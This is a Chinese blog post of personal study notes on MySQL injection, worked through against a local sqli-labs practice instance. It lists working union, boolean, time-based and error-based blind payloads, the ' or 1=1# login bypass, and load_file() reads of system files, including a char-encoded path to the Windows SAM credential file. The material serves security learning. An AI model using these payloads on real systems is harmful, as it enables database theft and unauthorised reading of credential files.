<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="学习目标：能看懂大部分的sql语句，做到给一个复杂的sql语句能看懂，知道是干什么用的，为什么这么写. 第一部分：基础1、注入的分类：基于从服务器接收到的响应▲基于错误的 SQL 注入▲联合查询的类型▲堆查询注射▲SQL 盲注•基于布尔 SQL 盲注•基于时间的 SQL 盲注•基于报错的 SQL 盲注 基于如何处理输入的 SQL 查询（数据类型）•基于字符串•数字或整数为基础的 基于程度和顺序的注">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入的payload">
<meta property="og:url" content="http://yoursite.com/2019/09/01/sql注入的payload/index.html">
<meta property="og:site_name" content="ZSC0810の博客">
<meta property="og:description" content="学习目标：能看懂大部分的sql语句，做到给一个复杂的sql语句能看懂，知道是干什么用的，为什么这么写. 第一部分：基础1、注入的分类：基于从服务器接收到的响应▲基于错误的 SQL 注入▲联合查询的类型▲堆查询注射▲SQL 盲注•基于布尔 SQL 盲注•基于时间的 SQL 盲注•基于报错的 SQL 盲注 基于如何处理输入的 SQL 查询（数据类型）•基于字符串•数字或整数为基础的 基于程度和顺序的注">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568033164895.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568033694917.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568034279294.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568034437849.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568034550186.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568034716824.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568038433600.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568039869657.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568270847365.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568271009099.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568271204762.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568271242039.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568271272787.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568271521318.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568274625357.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568275046172.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568333523800.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568333585447.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568343567756.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568343980260.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568358189109.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568360532191.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568360638213.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568360761583.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568379645084.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568380310301.png">
<meta property="og:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568381361835.png">
<meta property="og:updated_time" content="2019-09-14T05:32:42.398Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sql注入的payload">
<meta name="twitter:description" content="学习目标：能看懂大部分的sql语句，做到给一个复杂的sql语句能看懂，知道是干什么用的，为什么这么写. 第一部分：基础1、注入的分类：基于从服务器接收到的响应▲基于错误的 SQL 注入▲联合查询的类型▲堆查询注射▲SQL 盲注•基于布尔 SQL 盲注•基于时间的 SQL 盲注•基于报错的 SQL 盲注 基于如何处理输入的 SQL 查询（数据类型）•基于字符串•数字或整数为基础的 基于程度和顺序的注">
<meta name="twitter:image" content="http://yoursite.com/2019/09/01/sql注入的payload/1568033164895.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/09/01/sql注入的payload/">





  <title>sql注入的payload | ZSC0810の博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ZSC0810の博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">记录成长中的点点滴滴</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/09/01/sql注入的payload/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ZSC0810">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/cat.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZSC0810の博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sql注入的payload</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-09-01T19:56:55+08:00">
                2019-09-01
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2019-09-14T13:32:42+08:00">
                2019-09-14
              </time>
            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3.7k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  15
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>学习目标：能看懂大部分的sql语句，做到给一个复杂的sql语句能看懂，知道是干什么用的，为什么这么写.</p>
<h1 id="第一部分：基础"><a href="#第一部分：基础" class="headerlink" title="第一部分：基础"></a>第一部分：基础</h1><h2 id="1、注入的分类："><a href="#1、注入的分类：" class="headerlink" title="1、注入的分类："></a>1、注入的分类：</h2><h3 id="基于从服务器接收到的响应"><a href="#基于从服务器接收到的响应" class="headerlink" title="基于从服务器接收到的响应"></a>基于从服务器接收到的响应</h3><p>▲基于错误的 SQL 注入<br>▲联合查询的类型<br>▲堆查询注射<br>▲SQL 盲注<br>•基于布尔 SQL 盲注<br>•基于时间的 SQL 盲注<br>•基于报错的 SQL 盲注</p>
<h3 id="基于如何处理输入的-SQL-查询（数据类型）"><a href="#基于如何处理输入的-SQL-查询（数据类型）" class="headerlink" title="基于如何处理输入的 SQL 查询（数据类型）"></a>基于如何处理输入的 SQL 查询（数据类型）</h3><p>•基于字符串<br>•数字或整数为基础的</p>
<h3 id="基于程度和顺序的注入-哪里发生了影响"><a href="#基于程度和顺序的注入-哪里发生了影响" class="headerlink" title="基于程度和顺序的注入(哪里发生了影响)"></a>基于程度和顺序的注入(哪里发生了影响)</h3><p>★一阶注射<br>★二阶注射<br>一阶注射是指输入的注射语句对 WEB 直接产生了影响， 出现了结果； 二阶注入类似存<br>储型 XSS， 是指输入提交的语句， 无法直接对 WEB 应用程序产生影响， 通过其它的辅助间<br>接的对 WEB 产生危害， 这样的就被称为是二阶注入.</p>
<h3 id="基于注入点的位置上的"><a href="#基于注入点的位置上的" class="headerlink" title="基于注入点的位置上的"></a>基于注入点的位置上的</h3><p>▲通过用户输入的表单域的注射。<br>▲通过 cookie 注射。<br>▲通过服务器变量注射。 （基于头部信息的注射） </p>
<p>以上就是通常分类，先记录下，通过后面的实验练习加深理解</p>
<h2 id="2、系统函数"><a href="#2、系统函数" class="headerlink" title="2、系统函数"></a>2、系统函数</h2><p>介绍几个常用函数：</p>
<ol>
<li>version()——MySQL 版本</li>
<li>user()——数据库用户名</li>
<li>database()——数据库名</li>
<li>@@datadir——数据库路径</li>
<li>@@version_compile_os——操作系统版本 </li>
</ol>
<h2 id="3、字符串连接函数"><a href="#3、字符串连接函数" class="headerlink" title="3、字符串连接函数"></a>3、字符串连接函数</h2><ol>
<li><p>concat(str1,str2,…)——没有分隔符地连接字符串</p>
</li>
<li><p>concat_ws(separator,str1,str2,…)——含有分隔符地连接字符串</p>
</li>
<li><p>group_concat(str1,str2,…)——连接一个组的所有字符串， 并以逗号分隔每一条数据</p>
<p>以上三个函数能一次性查出所有信息 .</p>
</li>
</ol>
<h2 id="4、一般用于尝试的语句"><a href="#4、一般用于尝试的语句" class="headerlink" title="4、一般用于尝试的语句"></a>4、一般用于尝试的语句</h2><p> Ps:–+可以用#替换， url 提交过程中 Url 编码后的#为%23 </p>
<p>or 1=1–+<br>‘or 1=1–+<br>“or 1=1–+<br>)or 1=1–+<br>‘)or 1=1–+<br>“) or 1=1–+<br>“))or 1=1–+ </p>
<p>一般的代码为：<br>$id=$_GET[‘id’];<br>$sql=”SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;</p>
<p>此处考虑两个点， 一个是闭合前面你的 ‘ 另一个是处理后面的 ‘ ， 一般采用两种思</p>
<p>路， 闭合后面的引号或者注释掉， 注释掉采用–+ 或者 #（%23） </p>
<h2 id="5、union-操作符的介绍"><a href="#5、union-操作符的介绍" class="headerlink" title="5、union 操作符的介绍"></a>5、union 操作符的介绍</h2><p>UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 请注意， UNION 内部的 SELECT<br>语句必须拥有相同数量的列。 列也必须拥有相似的数据类型。 同时， 每条 SELECT 语句中的<br>列的顺序必须相同。 </p>
<p>SQL UNION 语法<br>SELECT column_name(s) FROM table_name1<br>UNION<br>SELECT column_name(s) FROM table_name2<br>注释： 默认地， UNION 操作符选取不同的值。 如果允许重复的值， 请使用 UNION ALL。</p>
<p>另外， UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名。  </p>
<h2 id="6-、sql-中的逻辑运算"><a href="#6-、sql-中的逻辑运算" class="headerlink" title="6 、sql 中的逻辑运算"></a>6 、sql 中的逻辑运算</h2><p>万能密码：</p>
<p>正常</p>
<p>Select * from admin where username=’ admin’ and password=’ admin’ </p>
<p>密码：’ or 1=1# </p>
<p>Select * from admin where username=’ admin’ and password=’ ’ or 1=1# </p>
<p>where 子 句后有 三 个 条 件 语 句 ==username=’ admin’ and<br>password=’ ’ or 1=1，在sql 中and 运算优先级大于or的运算优先级，结果恒为真。</p>
<p><img src="/2019/09/01/sql注入的payload/1568033164895.png" alt="1568033164895"></p>
<h2 id="7、-注入流程"><a href="#7、-注入流程" class="headerlink" title="7、 注入流程"></a>7、 注入流程</h2><p><img src="/2019/09/01/sql注入的payload/1568033694917.png" alt="1568033694917"></p>
<p>数据库存储的数据形式如上图，注入的过程就是先拿到数据库名，再获取当前数据库名下的数据表，再获取当前数据表下的列，最后获取数据</p>
<p>Mysql 有一个系统数据库 information_schema， 存储着所有的数据库的相关信息， 一般的，<br>我们利用该表可以进行一次完整的注入。 以下为一般的流程 ：</p>
<p>猜数据库 ：</p>
<p><img src="/2019/09/01/sql注入的payload/1568034279294.png" alt="1568034279294"></p>
<p>猜某库的数据表 ：</p>
<p>select table_name from information_schema.tables where table_schema=’dvwa’</p>
<p><img src="/2019/09/01/sql注入的payload/1568034437849.png" alt="1568034437849"></p>
<p>猜某表的所有列 </p>
<p>select column_name from information_schema.columns where table_name=’users’</p>
<p><img src="/2019/09/01/sql注入的payload/1568034550186.png" alt="1568034550186"></p>
<p>获取某列的内容 </p>
<p>select * from 表名；</p>
<p><img src="/2019/09/01/sql注入的payload/1568034716824.png" alt="1568034716824"></p>
<h1 id="1-联合查询的类型"><a href="#1-联合查询的类型" class="headerlink" title="1 联合查询的类型"></a>1 联合查询的类型</h1><p><img src="/2019/09/01/sql注入的payload/1568038433600.png" alt="1568038433600"></p>
<p>payload：-1’union select 1,group_concat(schema_name),3 from information_schema.schemata –+</p>
<p>1、group_concat(str1,str2,…)——连接一个组的所有字符串， 并以逗号分隔每一条数据</p>
<p>2、union 联合注入， union 的作用是将两个 sql 语句进行联合， union 前后的两个 sql 语句的选择列数要相同才可以。 U<br>nion all 与 union 的区别是增加了去重的功能 </p>
<p>3、当 id 的数据在数据库中不存在时， id=-1， 两个 sql 语句进行联合操作时，当前一个语句选择的内容为空，就将后面的语句的内容显示出来，此处前台页面返回了我们构造的 union 的数据 </p>
<p>4、此处利用 order by 对前面的数据进行排序， 这里有三列数据， 我们就只能用order by 3,超过 3 就会报错。‘order by 4–+的结果显示结果超出。 </p>
<h1 id="2-盲注"><a href="#2-盲注" class="headerlink" title="2 盲注"></a>2 盲注</h1><p>盲注：sql 注入过程中， sql 语句执行的选择后， 选择的数据不能回显，不返回数据库当中的信息<br>到前端页面。 </p>
<p>盲注可以分为三类：</p>
<p>•基于布尔 SQL 盲注<br>•基于时间的 SQL 盲注<br>•基于报错的 SQL 盲注 </p>
<h3 id="1：-基于布尔-SQL-盲注-构造逻辑判断"><a href="#1：-基于布尔-SQL-盲注-构造逻辑判断" class="headerlink" title="1： 基于布尔 SQL 盲注-构造逻辑判断"></a>1： 基于布尔 SQL 盲注-构造逻辑判断</h3><p>  <a href="https://www.cnblogs.com/lcamry/p/5504374.html" target="_blank" rel="noopener">截取字符串相关函数解析</a></p>
<p>▲left(database(),1)&gt;’ s’ //left()函数</p>
<p>Explain:database()显示数据库名称， left(a,b)从左侧截取 a 的前 b 位</p>
<p>▲ascii(substr((select table_name information_schema.tables where tables_schema<br>=database()limit 0,1),1,1))=101 –+ //substr()函数， ascii()函数</p>
<p>Explain： substr(a,b,c)从 b 位置开始， 截取字符串 a 的 c 长度。 Ascii()将某个字符转换<br>为 ascii 值</p>
<p>▲ascii(substr((select database()),1,1))=98</p>
<p>▲ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER<br>BY id LIMIT 0,1),1,1))&gt;98%23 //ORD()函数， MID()函数</p>
<p>Explain： mid(a,b,c)从位置 b 开始， 截取 a 字符串的 c 位<br>Ord()函数同 ascii()， 将字符转为 ascii 值 </p>
<p>▲regexp 正则注入 存疑<br><a href="http://www.cnblogs.com/lcamry/articles/5717442.html" target="_blank" rel="noopener">正则注入介绍</a><br>用法介绍： select user() regexp ‘^[a-z]’;<br>Explain： 正则表达式的用法， user()结果为 root， regexp 为匹配 root 的正则表达式。<br>第二位可以用 select user() regexp ‘^ro’来进行。 </p>
<p>▲like 匹配注入 </p>
<p>和上述的正则类似， mysql 在匹配的时候我们可以用 ike 进行匹配。<br>用法： select user() like ‘ro% </p>
<p><img src="/2019/09/01/sql注入的payload/1568039869657.png" alt="1568039869657"></p>
<h3 id="2：-基于报错的-SQL-盲注-构造-payload-让信息通过错误提示回显出来-存疑"><a href="#2：-基于报错的-SQL-盲注-构造-payload-让信息通过错误提示回显出来-存疑" class="headerlink" title="2： 基于报错的 SQL 盲注-构造 payload 让信息通过错误提示回显出来  存疑"></a>2： 基于报错的 SQL 盲注-构造 payload 让信息通过错误提示回显出来  存疑</h3><h3 id="3-基于时间的-SQL-盲注–延时注入"><a href="#3-基于时间的-SQL-盲注–延时注入" class="headerlink" title="3:基于时间的 SQL 盲注–延时注入"></a>3:基于时间的 SQL 盲注–延时注入</h3><p>▲If(ascii(substr(database(),1,1))&gt;115,0,sleep(5))%23 //if 判断语句， 条件为假，<br>执行 sleep</p>
<p>IF表达式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">IF(expr1,expr2,expr3)</span><br></pre></td></tr></table></figure>

<p>如果 expr1 是TRUE (expr1 &lt;&gt; 0 and expr1 &lt;&gt; NULL)，则 IF()的返回值为expr2; 否则返回值则为 expr3。IF() 的返回值为数字值或字符串值，具体情况视其所在语境而定。</p>
<h4 id="布尔盲注演示"><a href="#布尔盲注演示" class="headerlink" title="布尔盲注演示"></a>布尔盲注演示</h4><p><a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;and" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;and</a> left(version(),1)=5#</p>
<p>1） 利用 left(database(),1)进行尝试   查看 version()， 数据库的版本号为 10.1.36, 这句话的意思是查看版本号第一位是不是1， 明显的返回的结果是正确的 </p>
<p><img src="/2019/09/01/sql注入的payload/1568270847365.png" alt="1568270847365"></p>
<p>当版本号不正确的时候， 则不能正确显示 you are in…… </p>
<p><img src="/2019/09/01/sql注入的payload/1568271009099.png" alt="1568271009099"></p>
<p><a href="http://127.0.0.1/sqllib/Less-5/" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/</a><br>?id=1 ‘and length(database())=8 –+  判读数据库长度</p>
<p><img src="/2019/09/01/sql注入的payload/1568271204762.png" alt="1568271204762"></p>
<p><img src="/2019/09/01/sql注入的payload/1568271242039.png" alt="1568271242039"></p>
<p><img src="/2019/09/01/sql注入的payload/1568271272787.png" alt="1568271272787"></p>
<p>猜测数据库第一位 继而猜测第二位 采用二分法</p>
<p><img src="/2019/09/01/sql注入的payload/1568271521318.png" alt="1568271521318"></p>
<h4 id="报错盲注演示"><a href="#报错盲注演示" class="headerlink" title="报错盲注演示"></a>报错盲注演示</h4><p><a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;</a> union Select 1,count(<em>),concat(0x3a,0x3a,(select user()),0<br>x3a,0x3a,floor(rand(0)</em>2))a from information_schema.columns group by a–+ </p>
<p>利用 double 数值类型超出范围进行报错注入<br><a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;</a> union select (exp(~(select * FROM(SELECT USER())a))),2,<br>3–+ </p>
<p>利用 bigint 溢出进行报错注入<br><a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;</a> union select (!(select * from (select user())x) - ~0),2,3-<br>-+ </p>
<p>xpath 函数报错注入<br><a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;</a> and extractvalue(1,concat(0x7e,(select @@version),0x7e))<br>–+ </p>
<p><a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;</a> and updatexml(1,concat(0x7e,(select @@version),0x7e),1)<br>–+ </p>
<p>利用数据的重复性<br><a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;union" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;union</a> select 1,2,3 from (select NAME_CONST(version(),1),<br>NAME_CONST(version(),1))x –+ </p>
<h4 id="演示盲注演示"><a href="#演示盲注演示" class="headerlink" title="演示盲注演示"></a>演示盲注演示</h4><p><a href="http://127.0.0.1/sqllib/Less-5/" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/</a><br>?id=1’and if(ascii(substr(database(),1,1))=116,1,sleep(5))–+  当错误的时候会有 5 秒的时间延时。 </p>
<p><img src="/2019/09/01/sql注入的payload/1568274625357.png" alt="1568274625357"></p>
<p>利用 BENCHMARK()进行延时注入  当结果正确的时候， 运行 ENCODE(‘MSG’,’by 5 seconds’)操作 50000000 次， 会占用一段时间。 </p>
<p><a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;UNION" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;UNION</a> SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BEN<br>CHMARK(50000000,ENCODE(‘MSG’,’by 5 seconds’)),null)),2,3 FROM (select database() as cur<br>rent) as tb1–+ </p>
<p><img src="/2019/09/01/sql注入的payload/1568275046172.png" alt="1568275046172"></p>
<p>猜数据库：</p>
<p><a href="http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+</a> </p>
<p>说明第一位是 s （ascii 码是 115） </p>
<p><a href="http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+</a><br>说明第二位是 e （ascii 码是 101） </p>
<p>以此类推 猜出数据的名字是security</p>
<p>猜测 security 的数据表：<br><a href="http://127.0.0.1/sqllib/Less-9/?id=1&#39;and" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-9/?id=1&#39;and</a> If(ascii(substr((select table_name from information_s<br>chema.tables where table_schema=’security’ limit 0,1),1,1))=101,1,sleep(5))–+<br>猜测第一个数据表的第一位是 e,…依次类推， 得到 emails </p>
<p><a href="http://127.0.0.1/sqllib/Less-9/?id=1&#39;and" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-9/?id=1&#39;and</a> If(ascii(substr((select table_name from information_s<br>chema.tables where table_schema=’security’ limit 1,1),1,1))=114,1,sleep(5))–+<br>猜测第二个数据表的第一位是 r,…依次类推， 得到 referers </p>
<p>以此类推， 我们可以得到所有的数据表 emails,referers,uagents,users </p>
<p>猜测users表的列</p>
<p><a href="http://127.0.0.1/sqllib/Less-9/?id=1&#39;and" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-9/?id=1&#39;and</a> If(ascii(substr((select column_name from information<br>schema.columns where table_name=’users’ limit 0,1),1,1))=105,1,sleep(5))–+<br>猜测 users 表的第一个列的第一个字符是 i，<br>以此类推， 我们得到列名是 id， username， password </p>
<p>猜测 username 的值：<br><a href="http://127.0.0.1/sqllib/Less-9/?id=1&#39;and" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-9/?id=1&#39;and</a> If(ascii(substr((select username from users limit 0,1),<br>1,1))=68,1,sleep(5))–+<br>猜测 username 的第一行的第一位<br>以此类推， 我们得到数据库 username， password 的所有内容 </p>
<h2 id="3-文件的导入导出"><a href="#3-文件的导入导出" class="headerlink" title="3 文件的导入导出"></a>3 文件的导入导出</h2><h4 id="1、-load-file-导出文件"><a href="#1、-load-file-导出文件" class="headerlink" title="1、 load_file()导出文件"></a>1、 load_file()导出文件</h4><p>Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。<br>使用条件：<br>A、 必须有权限读取并且文件必须完全可读<br>and (select count(<em>) from mysql.user)&gt;0/</em> 如果结果返回正常,说明具有读写权限。<br>and (select count(<em>) from mysql.user)&gt;0/</em> 返回错误， 应该是管理员给数据库帐户降权<br>B、 欲读取文件必须在服务器上<br>C、 必须指定文件完整的路径<br>Mysql 注入—sqlilabs—lcamry<br>30<br>D、 欲读取文件必须小于 max_allowed_packet<br>如果该文件不存在， 或因为上面的任一原因而不能被读出， 函数返回空。 比较难满足的<br>就是权限， 在 windows 下， 如果 NTFS 设置得当， 是不能读取相关的文件的， 当遇到只有<br>administrators 才能访问的文件， users 就别想 load_file 出来。<br>在实际的注入中， 我们有两个难点需要解决：<br>绝对物理路径<br>构造有效的畸形语句 （报错爆出绝对路径）<br>在很多 PHP 程序中， 当提交一个错误的 Query， 如果 display_errors = on， 程序就会暴露<br>WEB 目录的绝对路径， 只要知道路径， 那么对于一个可以注入的 PHP 程序来说， 整个服务<br>器的安全将受到严重的威胁。<br>常用路径：<br><a href="http://www.cnblogs.com/lcamry/p/5729087.html" target="_blank" rel="noopener">http://www.cnblogs.com/lcamry/p/5729087.html</a><br>示例： Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,<br>114,101,112,97,105,114,92,115,97,109)))<br>利用 hex()将文件内容导出来， 尤其是 smb 文件时可以使用。<br>-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))<br>Explain： “char(99,58,47,98,111,111,116,46,105,110,105)” 就是“c:/boot.ini” 的 ASCII 代码<br>-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)<br>Explain： “c:/boot.ini” 的 16 进制是“0x633a2f626f6f742e696e69”<br>-1 union select 1,1,1,load_file(c:\boot.ini)<br>Explain:路径里的/用 \代替 </p>
<h4 id="2、-文件导入到数据库"><a href="#2、-文件导入到数据库" class="headerlink" title="2、 文件导入到数据库"></a>2、 文件导入到数据库</h4><p>LOAD DATA INFILE 语句用于高速地从一个文本文件中读取行， 并装入一个表中。 文件名称必<br>须为一个文字字符串。 </p>
